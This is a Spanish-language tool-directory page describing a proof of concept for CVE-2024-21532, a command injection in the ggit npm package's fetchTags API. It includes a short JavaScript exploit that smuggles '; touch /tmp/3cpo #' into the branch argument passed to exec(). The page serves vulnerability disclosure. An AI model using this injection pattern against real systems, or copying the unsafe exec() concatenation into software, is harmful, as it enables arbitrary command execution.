Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-21532-PoC-ggit — Prueba de concepto del exploit para CVE-2024-21532, una vulnerabilidad de inyección de comandos en la API fetchTags del paquete npm ggit, que demuestra el uso inseguro de exec(). | Kitploit
Herramientas/GitHubGitHub/lirantal/cve-2024-21532-poc-ggit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPapers e InvestigaciónAprendizaje y Educación
GitHublirantal/cve-2024-21532-poc-ggit

CVE-2024-21532-PoC-ggit

Prueba de concepto del exploit para CVE-2024-21532, una vulnerabilidad de inyección de comandos en la API fetchTags del paquete npm ggit, que demuestra el uso inseguro de exec().

Ver Repositorio
2hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad de Inyección de Comandos CVE-2024-21532 en ggit

ggit se describe a sí mismo como:

root@kitploit:~
Envoltorios de comandos git locales que retornan promesas

Recursos:

  • Código fuente del proyecto en GitHub: https://github.com/bahmutov/ggit
  • Paquete npm del proyecto: https://www.npmjs.com/package/ggit
  • Artículo detallado sobre esta vulnerabilidad: https://nodejs-security.com/blog/flawed-git-promises-library-on-npm-leads-to-command-injection-vulnerability

Contexto sobre la explotación

Estoy reportando una vulnerabilidad de Inyección de Comandos en el paquete npm ggit.

Esta vulnerabilidad se manifiesta con la API fetchTags(branch) de la biblioteca, que permite que la entrada del usuario especifique la rama a obtener y luego concatena esta cadena junto con un comando git que luego se pasa a la insegura API del proceso hijo de Node.js.

exec()

Exploit

  1. Instala [email protected] o anterior
  2. Establece la siguiente Prueba de Concepto (PoC):
root@kitploit:~
const fetchTags = require("ggit").fetchTags;
fetchTags("; touch /tmp/3cpo #").then(function () {
  // should be same as running command
  // git pull origin --tags
  console.log("done");
});
  1. Observa el nuevo archivo creado en disco en /tmp/3cpo

Contribuciones

Consulta CONTRIBUTING para obtener pautas sobre cómo contribuir a este proyecto.

Autor

Liran Tal

Descargar herramienta